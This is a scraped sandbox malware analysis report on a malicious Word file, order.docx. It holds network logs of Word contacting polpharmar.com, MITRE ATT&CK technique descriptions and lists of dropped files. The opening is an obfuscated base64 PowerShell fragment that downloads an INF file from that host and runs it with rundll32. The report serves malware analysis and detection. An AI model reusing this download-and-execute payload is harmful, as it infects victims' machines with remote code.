"[char]0x3A+'fRombASe64StRINg('+[CHar]0X22+'U1RPcC1Qck9jZXNTIC1mb1JjZSAtTmFNZSAnbXNkdCc7JEtZID0gYWRkLXRZUEUgLW1lbUJlcmRFRmluaVRJT04gJ1tEbGxJbXBvcnQoIlVSbG1vTi5EbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIFIsc3RyaW5nIGJpTCxzdHJpbmcgdXdlLHVpbnQgUm5vLEludFB0ciB1Ryk7JyAtbkFtRSAiWXZRIiAtTkF" + "tRVNQYUNlIEhLZyAtUGFzc1RocnU7ICRLWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovL3BvbHBoYXJtYXIuY29tL3Rlc3QuaW5mIiwiJGVudjpBUFBEQVRBXHRlc3QuaW5mIiwwLDApO1NUYXJ0LXNMRWVQKDMpO1J1bkRsbDMyLkVYZSBhZHZwQWNLLmRsTCxMYXVuY2hJTkZTZWN0aW9uRXggIiRlTlY6QVBQREFUQVx0ZXN
Aug 1, 2022 10:49:53.274751902 CEST	20	OUT	HEAD /test.html HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: polpharmar.com Content-Length: 0 Connection: Keep-Alive
Aug 1, 2022 10:49:53.324143887 CEST	20	IN	HTTP/1.1 200 OK Date: Mon, 01 Aug 2022 08:49:53 GMT Server: Apache Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT Accept-Ranges: bytes Content-Length: 12744 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html
Aug 1, 2022 10:49:53.569763899 CEST	20	OUT	HEAD /test.html HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: polpharmar.com Content-Length: 0 Connection: Keep-Alive
Aug 1, 2022 10:49:53.619056940 CEST	21	IN	HTTP/1.1 200 OK Date: Mon, 01 Aug 2022 08:49:53 GMT Server: Apache Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT Accept-Ranges: bytes Content-Length: 12744 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html
Aug 1, 2022 10:49:56.855813026 CEST	24	OUT	GET /test.html HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: polpharmar.com If-Modified-Since: Sun, 31 Jul 2022 09:45:54 GMT Connection: Keep-Alive
Aug 1, 2022 10:49:56.904831886 CEST	25	IN	HTTP/1.1 304 Not Modified Date: Mon, 01 Aug 2022 08:49:56 GMT Server: Apache Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT Accept-Ranges: bytes Keep-Alive: timeout=5, max=97 Connection: Keep-Alive
Aug 1, 2022 10:49:56.926876068 CEST	25	OUT	HEAD /test.html HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: polpharmar.com Content-Length: 0 Connection: Keep-Alive
Aug 1, 2022 10:49:56.976238966 CEST	25	IN	HTTP/1.1 200 OK Date: Mon, 01 Aug 2022 08:49:56 GMT Server: Apache Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT Accept-Ranges: bytes Content-Length: 12744 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html
Aug 1, 2022 10:49:57.166090012 CEST	26	OUT	HEAD /test.html HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: polpharmar.com Content-Length: 0 Connection: Keep-Alive
Aug 1, 2022 10:49:57.215281963 CEST	26	IN	HTTP/1.1 200 OK Date: Mon, 01 Aug 2022 08:49:57 GMT Server: Apache Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT Accept-Ranges: bytes Content-Length: 12744 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49175	91.235.116.180	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Aug 1, 2022 10:49:54.392364979 CEST	21	OUT	HEAD /test.html HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: polpharmar.com
Aug 1, 2022 10:49:54.441466093 CEST	22	IN	HTTP/1.1 200 OK Date: Mon, 01 Aug 2022 08:49:54 GMT Server: Apache Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT Accept-Ranges: bytes Content-Length: 12744 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html
Aug 1, 2022 10:49:54.690577030 CEST	22	IN	HTTP/1.1 200 OK Date: Mon, 01 Aug 2022 08:49:54 GMT Server: Apache Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT Accept-Ranges: bytes Content-Length: 12744 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html

Target ID:	0
Start time:	10:49:20
Start date:	01/08/2022
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f390000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

⊘No disassembly

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report order.docx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{BDA067BC-A85F-4D09-B1E2-A27A26259E72}.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{87FAB0B5-CE0C-4484-80A4-0721760F3A7E}.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\test[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\14683F8F.jpg

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A51B846.htm

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B00ABF75.htm

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{45FF0D1D-AF9D-41F4-B5D7-9125F330AE9F}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FC65F658-05F2-4F35-9C52-226D776E880F}.tmp

C:\Users\user\AppData\Local\Temp\{502EA169-3BBF-4D41-A8CE-F39114DECA2E}

C:\Users\user\AppData\Local\Temp\{F1216906-4709-45A5-B8F3-741536BBB63B}

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\order.LNK

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

C:\Users\user\Desktop\~$order.docx

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

Windows Analysis Report
order.docx